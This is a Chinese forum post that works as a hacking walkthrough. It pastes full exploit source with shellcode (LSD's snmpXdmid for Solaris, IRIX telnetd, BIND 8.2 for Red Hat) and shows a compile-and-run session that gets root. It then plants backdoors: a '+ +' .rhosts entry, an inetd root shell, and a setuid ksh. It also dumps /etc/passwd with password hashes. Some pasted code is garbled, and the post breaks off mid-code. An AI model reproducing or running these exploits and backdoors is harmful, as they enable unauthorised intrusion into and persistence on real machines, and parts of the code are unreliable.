我们这次来尝试进入一台 Solaris 8的机器。





-------------------------------------------------test--------------------------------------------------------------

C:\>telnet 192.168.0.2



SunOS 5.7



login: login: delex

Password:

*********************************************************



# The JRun is now replaced by JServ

# To restart the servlet server, please use



rs.sh



# However, as the JServ will reload those classes

# inside the "/usr/proj/gipex/class", you just

# need to remove the old class with the new one.



*********************************************************

$ w

9:21am up 61 day(s), 18:42, 2 users, load average: 0.03, 0.04, 0.05

User tty login@ idle JCPU PCPU what

root console 4May0162days 2 2 /usr/dt/bin/sdt_shell -c ? u

root pts/4 Fri 4pm 6days tail -f syslog

delex pts/6 9:21am w

$ls –al /usr/lib/…

total 202

drwxrwxr-x 2 root staff 512 Jul 5 10:22 .

drwxrwxr-x 46 root bin 10240 Jul 4 19:21 ..

-r-sr-sr-x 1 root staff 91668 Jul 5 10:22 .x

$ id

uid=1035(delex) gid=20(staff)

$ /usr/lib/.../.x (***运行昨天留下的本地后门直接获得root权限***)

# id

uid=1035(delex) gid=20(staff) euid=0(root)

# cd /tmp

# ls –al (***昨天的程序都忘了删呢,走得太急啦,不知道还在不在呢***)

total 1410

drwxrwxrwt 7 sys sys 1236 Jul 5 10:20 .

drwxrwxrwx 35 root root 1024 Jul 4 19:15 ..

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix

drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia

drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable

drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class

-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0

-rwxrwxr-x 1 delex staff 8572 Jul 4 20:33 lpset (***HOHO~**)

-rw-rw-r-- 1 delex staff 1685 Jul 4 20:32 lpset.c

-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb

-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf

-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data

-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399

-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock

-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 isbase

-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c

-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data

# cat > snmp.c (***源程序在http://lsd-pl.net/files/get?SOLARIS/solsparc_snmpxdmid ***)

#include

#include

#include

#include

#include

#include

#include

#include

#include



#define SNMPXDMID_PROG 100249

#define SNMPXDMID_VERS 0x1

#define SNMPXDMID_ADDCOMPONENT 0x101



char findsckcode[]=

"\x20\xbf\xff\xff" /* bn,a */

"\x20\xbf\xff\xff" /* bn,a */

"\x7f\xff\xff\xff" /* call */

"\x33\x02\x12\x34"

"\xa0\x10\x20\xff" /* mov 0xff,%l0 */

"\xa2\x10\x20\x54" /* mov 0x54,%l1 */

"\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */

"\xaa\x03\xe0\x28" /* add %o7,40,%l5 */

"\x81\xc5\x60\x08" /* jmp %l5+8 */

"\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4] */

"\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */

"\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */

"\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4 */

"\x02\xbf\xff\xfb" /* bz */

"\xaa\x03\xe0\x5c" /* add %o7,92,%l5 */

"\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */

"\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */

"\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */

"\x90\x04\x20\x01" /* add %l0,1,%o0 */

"\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */

"\x92\x14\xe0\x91" /* or %l3,0x91,%o1 */

"\x94\x03\xff\xc4" /* add %o7,-60,%o2 */

"\x82\x10\x20\x36" /* mov 0x36,%g1 */

"\x91\xd0\x20\x08" /* ta 8 */

"\x1a\xbf\xff\xf1" /* bcc */

"\xa0\xa4\x20\x01" /* deccc %l0 */

"\x12\xbf\xff\xf5" /* bne */

"\xa6\x10\x20\x03" /* mov 0x03,%l3 */

"\x90\x04\x20\x02" /* add %l0,2,%o0 */

"\x92\x10\x20\x09" /* mov 0x09,%o1 */

"\x94\x04\xff\xff" /* add %l3,-1,%o2 */

"\x82\x10\x20\x3e" /* mov 0x3e,%g1 */

"\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */

"\x12\xbf\xff\xfb" /* bne */

"\x91\xd0\x20\x08" /* ta 8 */

;



char shellcode[]=

"\x20\xbf\xff\xff" /* bn,a */

"\x20\xbf\xff\xff" /* bn,a */

"\x7f\xff\xff\xff" /* call */

"\x90\x03\xe0\x20" /* add %o7,32,%o0 */

"\x92\x02\x20\x10" /* add %o0,16,%o1 */

"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */

"\xd0\x22\x20\x10" /* s "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */

"\x82\x10\x20\x0b" /* mov 0x0b,%g1 */

"\x91\xd0\x20\x08" /* ta 8 */

"/bin/ksh"

;



static char nop[]="\x80\x1c\x40\x11";



typedef struct{

struct{unsigned int len;char *val;}name;

struct{unsigned int len;char *val;}pragma;

}req_t;



bool_t xdr_req(XDR *xdrs,req_t *objp){

char *v=NULL;unsigned long l=0;int b=1;

if(!xdr_u_long(xdrs,&l)) return(FALSE);

if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);

if(!xdr_bool(xdrs,&b)) return(FALSE);

if(!xdr_u_long(xdrs,&l)) return(FALSE);

if(!xdr_bool(xdrs,&b)) return(FALSE);

if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char),

(xdrproc_t)xdr_char)) return(FALSE);

if(!xdr_bool(xdrs,&b)) return(FALSE);

if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char),

(xdrproc_t)xdr_char)) return(FALSE);

if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);

if(!xdr_u_long(xdrs,&l)) return(FALSE);

return(TRUE);

}



main(int argc,char **argv){

char buffer[140000],address[4],pch[4],*b;

int i,c,n,vers=-1,port=0,sck;

CLIENT *cl;enum clnt_stat stat;

struct hostent *hp;

struct sockaddr_in adr;

struct timeval tm={10,0};

req_t req;



printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\n");

printf("snmpXdmid for solaris 2.7 2.8 sparc\n\n");



if(argc<2){

printf("usage: %s address [-p port] -v 7|8\n",argv[0]);

exit(-1);

}



while((c=getopt(argc-1,&argv[1],"p:v:"))!=-1){

switch(c){

case 'p': port=atoi(optarg);break;

case 'v': vers=atoi(optarg);

}

}

switch(vers){

case 7: *(unsigned int*)address=0x000b1868;break;

case 8: *(unsigned int*)address=0x000cf2c0;break;

default: exit(-1);

}



*(unsigned long*)pch=htonl(*(unsigned int*)address+32000);

*(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);



printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);

fflush(stdout);



adr.sin_family=AF_INET;

adr.sin_port=htons(port);

if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){

if((hp=gethostbyname(argv[1]))==NULL){

errno=EADDRNOTAVAIL;perror("error");exit(-1);

}

memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);

}



sck=RPC_ANYSOCK;

if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){

clnt_pcreateerror("error");exit(-1);

}

cl->cl_auth=authunix_create("localhost",0,0,0,NULL);



i=sizeof(struct sockaddr_in);

if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){

struct{unsigned int maxlen;unsigned int len;char *buf;}nb;

ioctl(sck,(('S'<<|2),"sockmod");

nb.maxlen=0xffff;

nb.len=sizeof(struct sockaddr_in);;

nb.buf=(char*)&adr;

ioctl(sck,(('T'<<|144),&nb);

}

n=ntohs(adr.sin_port);

printf("port=%d connected! ",n);fflush(stdout);



findsckcode[12+2]=(unsigned char)((n&0xff00)>>;

findsckcode[12+3]=(unsigned char)(n&0xff);



b=&buffer[0];

for(i=0;i<1248;i++) *b++=pch[i%4];

for(i=0;i<352;i++) *b++=address[i%4];

*b=0;



b=&buffer[10000];

for(i=0;i<64000;i++) *b++=0;

for(i=0;i<64000-188;i++) *b++=nop[i%4];

for(i=0;i
for(i=0;i
*b=0;



req.name.len=1200+400+4;

req.name.val=&buffer[0];

req.pragma.len=128000+4;

req.pragma.val=&buffer[10000];



stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);

if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}

printf("sent!\n");



write(sck,"/bin/uname -a\n",14);

while(1){

fd_set fds;

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(sck,&fds);

if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){

int cnt;

char buf[1024];

if(FD_ISSET(0,&fds)){

if((cnt=read(0,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(sck,buf,cnt);

}

if(FD_ISSET(sck,&fds)){

if((cnt=read(sck,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(1,buf,cnt);

}

}

}

}

^D




I love Redhat!


redhat
LINUX菜鸟


注册日期: 10-14-2002
总发帖数: 44

用户等级: 13
贡献数值: 3.327
升级点数: 4.033




主题发起者

  

  12-09-2002 12:50      

--------------------------------------------------------------------------------


# gcc -o snmp snmp.c

snmp.c: In function `main':

snmp.c:135: warning: assignment makes pointer from integer without a cast

snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type

Undefined first referenced

symbol in file

xdr_void /var/tmp/cca3rEDd.o

clnttcp_create /var/tmp/cca3rEDd.o

gethostbyname /var/tmp/cca3rEDd.o

xdr_bool /var/tmp/cca3rEDd.o

xdr_u_long /var/tmp/cca3rEDd.o

authsys_create /var/tmp/cca3rEDd.o

inet_addr /var/tmp/cca3rEDd.o

clnt_pcreateerror /var/tmp/cca3rEDd.o

xdr_array /var/tmp/cca3rEDd.o

getsockname /var/tmp/cca3rEDd.o

xdr_char /var/tmp/cca3rEDd.o

xdr_pointer /var/tmp/cca3rEDd.o

ld: fatal: Symbol referencing errors. No output written to snmp (***编译失败***)

collect2: ld returned 1 exit status

# gcc -o snmp snmp.c –lnsl

snmp.c: In function `main':

snmp.c:135: warning: assignment makes pointer from integer without a cast

snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type

Undefined first referenced

symbol in file

getsockname /var/tmp/ccBaS71K.o

ld: fatal: Symbol referencing errors. No output written to snmp

collect2: ld returned 1 exit status

# gcc -o snmp snmp.c -lnsl –lsocket (***要利用nsl和socket的库进行编译***)

snmp.c: In function `main':

snmp.c:135: warning: assignment makes pointer from integer without a cast

snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type

# ./snmp

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc



usage: ./snmp address [-p port] -v 7|8

#./snmp 192.168.0.4 –v 8 (***192.168.0.4 是台sunos 5.8 sparc的机器***)

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc



adr=0x000c8f68 timeout=30 port=928 connected!

sent!

SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250

id

uid=0(root) gid=0(root)

echo “+ +” >/.rhosts

echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x

/usr/sbin/inetd -s /tmp/.x

rm -f /tmp/.x

telnet localhost 1524

Trying 127.0.0.1...

Connected to localhost. Escape character is '^]'.

# id

ksh: id^M: not found

# id;

uid=0(root) gid=0(root)

ksh: ^M: not found

# exit;

Connection closed by foreign host.

Exit (***随便装个后门走人***)

#

-------------------------------------------------test--------------------------------------------------------------





SunOS 5.6 5.7 5.8的机器都有了,找找其他系统吧。

什么系统最破呢?

Win2000?

呵呵,我说的是UNIX系列。

告诉大家,IRIX最破~

HOHO~

记得昨天就扫到一台IRIX的破机器呢,我们接着来干掉它~





-------------------------------------------------test--------------------------------------------------------------

# telnet 192.168.0.10

Trying 192.168.0.10...

Connected to 192.168.0.10.

Escape character is '^]'.





IRIX (O2)



login: isbase

Password:

UX:login: ERROR: Login incorrect

login:^]

telnet> quit

Connection closed.

#cat > telnetd.c (***源程序在http://lsd-pl.net/files/get?IRIX/irx_telnetd ***)

#include

#include

#include

#include

#include

#include

#include

#include



char shellcode[]=

"\x04\x10\xff\xff" /* bltzal $zero, */

"\x24\x02\x03\xf3" /* li $v0,1011 */

"\x23\xff\x02\x14" /* addi $ra,$ra,532 */

"\x23\xe4\xfe\x08" /* addi $a0,$ra,-504 */

"\x23\xe5\xfe\x10" /* addi $a1,$ra,-496 */

"\xaf\xe4\xfe\x10" /* sw $a0,-496($ra) */

"\xaf\xe0\xfe\x14" /* sw $zero,-492($ra) */

"\xa3\xe0\xfe\x0f" /* sb $zero,-497($ra) */

"\x03\xff\xff\xcc" /* syscall */

"/bin/sh"

;



typedef struct{char *vers;}tabent1_t;

typedef struct{int flg,len;int got,g_ofs,subbuffer,s_ofs;}tabent2_t;



tabent1_t tab1[]={

{ "IRIX 6.2 libc.so.1: no patches telnetd: no patches " },

{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: no patches " },

{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: no patches " },

{ "IRIX 6.2 libc.so.1: no patches telnetd: 1485|2070|3117|3414 " },

{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: 1485|2070|3117|3414 " },

{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: 1485|2070|3117|3414 " },

{ "IRIX 6.3 libc.so.1: no patches telnetd: { "IRIX 6.3 libc.so.1: 2087 telnetd: no patches " },

{ "IRIX 6.3 libc.so.1: 3535|3737|3770 telnetd: no patches " },

{ "IRIX 6.4 libc.so.1: no patches telnetd: no patches " },

{ "IRIX 6.4 libc.so.1: 3491|3769|3738 telnetd: no patches " },

{ "IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches " },

{ "IRIX 6.5.8f telnetd: no patches " }

};



tabent2_t tab2[]={

{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14 },

{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14 },

{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14 },

{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14 },

{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14 },

{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14 },

{ 0, 0x56, 0x0fb4fce0, 104, 0x7fc4d230, 0x14 },

{ 0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14 },

{ 0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14 },

{ 1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c },

{ 1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c },

{ 1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c },

{ 1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c }

};



char env_value[1024];



int prepare_env(int vers){

int i,adr,pch,adrh,adrl;

char *b;



pch=tab2[vers].got+(tab2[vers].g_ofs*4);

adr=tab2[vers].subbuffer+tab2[vers].s_ofs;

adrh=(adr>>16)-tab2[vers].len;

adrl=0x10000-(adrh&0xffff)+(adr&0xffff)-tab2[vers].len;



b=env_ if(!tab2[vers].flg){

for(i=0;i<1;i++) *b++=' ';

for(i=0;i<4;i++) *b++=(char)((pch>>(3-i%4)*)&0xff);

for(i=0;i<4;i++) *b++=(char)((pch+2>>(3-i%4)*)&0xff);

for(i=0;i<3;i++) *b++=' ';

for(i=0;i
*b++=shellcode;

if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode;

}

sprintf(b,"%%%05dc%%22$hn%%%05dc%%23$hn",adrh,adrl);

}else{

for(i=0;i<5;i++) *b++=' ';

for(i=0;i<4;i++) *b++=(char)((pch>>(3-i%4)*)&0xff);

for(i=0;i<4;i++) *b++=' ';

for(i=0;i<4;i++) *b++=(char)((pch+2>>(3-i%4)*)&0xff);

for(i=0;i<3;i++) *b++=' ';

for(i=0;i
*b++=shellcode;

if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode;

}

sprintf(b,"%%%05dc%%11$hn%%%05dc%%12$hn",adrh,adrl);

}

b+=strlen(b);

return(b-env_value);

}



main(int argc,char **argv){

char buffer[8192];

int i,c,sck,il,ih,cnt,vers=65;

struct hostent *hp;

struct sockaddr_in adr;



printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/\n");

printf("telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all\n\n");



if(argc<2){

printf("usage: %s address [-v 62|63|64|65]\n",argv[0]);

exit(-1);

}



while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){

switch(c){

case 'v': vers=atoi(optarg);

}

}



switch(vers){

case 62: il=0;ih=5; break;

case 63: il=6;ih=8; break;

case 64: il=9;ih=10; break;

case 65: il=11;ih=12; break;

default: exit(-1);

}



for(i=il;i<=ih;i++){

printf(".");fflush(stdout);

sck=socket(AF_INET,SOCK_STREAM,0);

adr.sin_family=AF_INET;

adr.sin_port=htons(23);

if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){

if((hp=gethostbyname(argv[1]))==NULL){

errno=EADDRNOTAVAIL;perror("error");exit(-1);

}

memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);

}



if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){

perror("error");exit(-1);

}



cnt=prepare_env(i);

memcpy(buffer,"\xff\xfa\x24\x00\x01\x58\x58\x58\x58\x00",10);

sprintf(&buffer[10],"%s\xff\xf0",env_value);

write(sck,buffer,10+cnt+2);

sleep(1);

memcpy(buffer,"\xff\xfa\x24\x00\x01\x5f\x52\x4c\x44\x00%s\xff\xf0",10);

sprintf(&buffer[10],"%s\xff\xf0",env_value);

write(sck,buffer,10+cnt+2);



if(((cnt=read(sck,buffer,sizeof(buffer)))<2)||(buffer[0]!=(char)0xff)){

printf("warning: telnetd seems to be used with tcp wrapper\n");

}



write(sck,"/bin/uname -a\n",14);

if((cnt=read(sck,buffer,sizeof(buffer)))>0){

printf("\n%s\n\n",tab1.vers);

write(1,buffer,cnt);

break;

}

close(sck);

}

if(i>ih) {printf("\nerror: not vulnerable\n");exit(-1);}



while(1){

fd_set fds;

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(sck,&fds);

if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){

int cnt;

char buf[1024];

if(FD_ISSET(0,&fds)){

if((cnt=read(0,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(sck,buf,cnt);

}

if(FD_ISSET(sck,&fds)){

if((cnt=read(sck,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(1,buf,cnt);

}

}

}

}

^D



# gcc -o telnetd telnetd.c

telnetd.c:33: parse error before `IRIX'

telnetd.c:37: malformed floating constant

telnetd.c:37: nondigits in number and not hexadecimal

telnetd.c:37: malformed floating constant

telnetd.c:38: malformed floating constant

telnetd.c:77: nondigits in number and not hexadecimal

… (***因为粘贴文本出错,一大堆出错信息***)

# vi telnetd.c (***只好用vi来编辑程序***)

"telnetd.c" [New file]

#include

#include

#include



(***重新粘贴一遍***)



"telnetd.c" [New file] 188 lines, 6738 characters

# gcc -o telnetd telnetd.c

Undefined first referenced

symbol in file

socket /var/tmp/ccuoeAph.o

gethostbyname /var/tmp/ccuoeAph.o

inet_addr /var/tmp/ccuoeAph.o

connect /var/tmp/ccuoeAph.o

ld: fatal: Symbol referencing errors. No output written to telnetd

collect2: ld returned 1 exit status

# gcc -o telnetd telnetd.c -lsocket -lnsl

# ./telnetd

copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/

telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all



usage: ./telnetd address [-v 62|63|64|65]

# ./telnetd 192.168.0.10 -v 65

copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/

telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all



.

IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches



IRIX O2 6.5 05190004 IP32 (***溢出成功啦***)

id

uid=0(root) gid=0(sys)

cat /etc/passwd

root:mmanI4kyarAEA:0:0:Super-User:/:/usr/bin/tcsh

sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh

cmwlogin:*:0:994:CMW Login UserID:/usr/CMW:/sbin/csh

diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh

daemon:*:1:1:daemons:/:/dev/null

bin:*:2:2:System Tools Owner:/bin:/dev/null

uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh

sys:*:4:0:System Activity Owner:/var/adm:/bin/sh

adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh

lp::9:9rint Spooler Owner:/var/spool/lp:/bin/sh ***不少人进来过呢

nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico *

auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh

dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh

sgiweb:*:13:60001:SGI Web Applications:/var/www/htdocs:/bin/csh

rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh

EZsetup::992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh *

demos::993:997emonstration User:/usr/demos:/bin/csh *

OutOfBox::995:997ut of Box Experience:/usr/people/OutOfBox:/bin/csh *

guest::998:998:Guest Account:/usr/people/guest:/bin/csh *

4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh

nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null

noaccess:*:60002:60002:uid no access:/dev/null:/dev/null

nobody:*:60001:60001riginal nobody uid:/dev/null:/dev/null

informix:*:49999:777:Informix SA 3.0:/usr/sgi/informix:/bin/csh

posuser:gyo7hUq9BFNYE:55555:20:::

antoni:zUzbvPoZ6HC4g:23117:20:antoniWang:/usr/people/antoni:/bin/csh

#mkdir /usr/lib/... (***有这么多用户可以登陆,我们做个suid root shell就可以啦。***)

cp /bin/ksh /usr/lib/.../.x

chmod +s /usr/lib/.../.x

exit

#

-------------------------------------------------test--------------------------------------------------------------





在SunOS 5.7平台下攻击IRIX 6.5 系统成功完成。:)

我们来找几台Linux 玩玩。找Redhat吧,漏洞多一些,比如rpc.statd wuftp bind lpd等。:P

我们同样以这个SunOs 5.7做为我们攻击Linux的平台。Lsd写的exploit通用性真不错。

这次我们用bind远程溢出来攻击redhat 6.2

不过因为前段时间的worm,bind的成功率已经很小啦。

大家可以试试其它的远程溢出~~





-------------------------------------------------test--------------------------------------------------------------

#cat > bind.c (***源程序在http://lsd-pl.net/files/get?LINUX/linx86_bind ***)

#include

#include

#include

#include

#include

#include

#include



char msg[]={

0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,

0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,

0x01,0x20,0x20,0x20,0x20,0x02,0x61

};



char asmcode[]=

"\x3f" /* label len 63 */

"\x90\x90\x90" /* padding */



"\xeb\x3b" /* jmp */

"\x31\xdb" /* xorl %ebx,%ebx */

"\x5f" /* popl %edi */

"\x83\xef\x7c" /* sub $0x7c,%edi */

"\x8d\x77\x10" /* leal 0x10(%edi),%esi */

"\x89\x77\x04" /* movl %esi,0x4(%edi) */

"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */

"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */

"\xb3\x10" /* movb $0x10,%bl */

"\x89\x19" /* movl %ebx,(%ecx) */

"\x31\xc9" /* xorl %ecx,%ecx */

"\xb1\xff" /* movb $0xff,%cl */

"\x89\x0f" /* movl %ecx,(%edi) */

"\x51" /* pushl %ecx */

"\x31\xc0" /* xorl %eax,%eax */

"\xb0\x66" /* movb $0x66,%al */

"\xb3\x07" /* movb $0x7,%bl */

"\x89\xf9" /* movl %edi,%ecx */

"\xcd\x80" /* int $0x80 */

"\x59" /* popl %ecx */

"\x31\xdb" /* xorl %ebx,%ebx */

"\x39\xd8" /* cmpl %ebx,%eax */

"\x75\x0a" /* jne */

"\x66\xbb\x12\x34" /* movw $0x1234,%bx */

"\x66\x39\x5e\x02" /* cmpw %bx,0x2(%esi) */

"\x74\x08" /* je */

"\xe2\xe0" /* loop */



"\x3f" /* label len 63 */



"\xe8\xc0\xff\xff\xff" /* call */

"\x89\xcb" /* movl %ecx,%ebx */

"\x31\xc9" /* xorl %ecx,%ecx */

"\xb1\x03" /* movb $0x03,%cl */

"\x31\xc0" /* xorl %eax,%eax */

"\xb0\x3f" /* movb $0x3f,%al */

"\x49" /* decl %ecx */

"\xcd\x80" /* int $0x80 */

"\x41" /* incl %ecx "\xe2\xf6" /* loop */



"\xeb\x14" /* jmp */

"\x31\xc0" /* xorl %eax,%eax */

"\x5b" /* popl %ebx */

"\x8d\x4b\x14" /* leal 0x14(%ebx),%ecx */

"\x89\x19" /* movl %ebx,(%ecx) */

"\x89\x43\x18" /* movl %eax,0x18(%ebx) */

"\x88\x43\x07" /* movb %al,0x7(%ebx) */

"\x31\xd2" /* xorl %edx,%edx */

"\xb0\x0b" /* movb $0xb,%al */

"\xcd\x80" /* int $0x80 */

"\xe8\xe7\xff\xff\xff" /* call */

"/bin/sh"



"\x90\x90\x90\x90" /* padding */

"\x90\x90\x90\x90"

;



int rev(int a){

int i=1;

if((*(char*)&i)) return(a);

return((a>>24)&0xff)|(((a>>16)&0xff)<<|(((a>>&0xff)<<16)|((a&0xff)<<24);

}



int main(int argc,char **argv){

char buffer[1024],*b;

int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;

struct hostent *hp;

struct sockaddr_in adr;



printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");

printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86\n\n");



if(argc<2){

printf("usage: %s address [-s][-e]\n",argv[0]);

printf(" -s send infoleak packet\n");

printf(" -e send exploit packet\n");

exit(-1);

}



while((c=getopt(argc-1,&argv[1],"se"))!=-1){

switch(c){

case 's': flag=1;break;

case 'e': flag=2;

}

}

if(flag==-1) exit(-1);



adr.sin_family=AF_INET;

adr.sin_port=htons(53);

if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {

if((hp=gethostbyname(argv[1]))==NULL) {

errno=EADDRNOTAVAIL;goto err;

}

memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);

}



sck[0]=socket(AF_INET,SOCK_DGRAM,0);

sck[1]=socket(AF_INET,SOCK_STREAM,0);



if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;

if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;



i=sizeof(struct sockaddr_in);

if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){

struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};

struct netbuf nb;

ioctl(sck[1],(('S'<<|2),"sockmod");

nb.maxlen=0xffff;

nb.len=sizeof(struct sockaddr_in);;

nb.buf=(char*)&adr;

ioctl(sck[1],(('T'<<|144),&nb);

}

n=ntohs(adr.sin_port);



asmcode[4+48+2]=(unsigned char)((n>>&0xff);

asmcode[4+48+3]=(unsigned char)(n&0xff);



if(write(sck[0],msg,sizeof(msg))==-1) goto err;

if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;



printf("stack dump:\n");

for(i=0;i<cnt-512);i++){

printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);

}

printf("\n\n");



fp=rev(*(unsigned int*)&buffer[532]);

ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);

cnt=163;



if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){

printf("system does not seem to be a vulnerable linux\n");exit(1);

}

if(flag==1){

printf("system seems to be running bind 8.2.x on a linux\n");exit(-1);

}

if(cnt<ofs+2){

printf("frame ptr is too low to be successfully exploited\n");exit(-1);

}





jmp=rev(fp-586);

ptr6=rev((fp&0xffffff00)-12);

fp=rev(fp&0xffffff00);



printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);

printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);



b=buffer;

memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;

for(i=0;i
for(i=0;i<128>>1);i++,b++) *b++=0x01;

memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;

for(i=0;i<(ofs+64)>>1);i++,b++) *b++=0x01;



*b++=28;

memcpy(b,"\x06\x00\x00\x00",4);b+=4;

memcpy(b,&fp,4);b+=4;

memcpy(b,"\x06\x00\x00\x00",4);b+=4;

memcpy(b,&jmp,4);b+=4;

memcpy(b,&jmp,4);b+=4;

memcpy(b,&fp,4);b+=4;

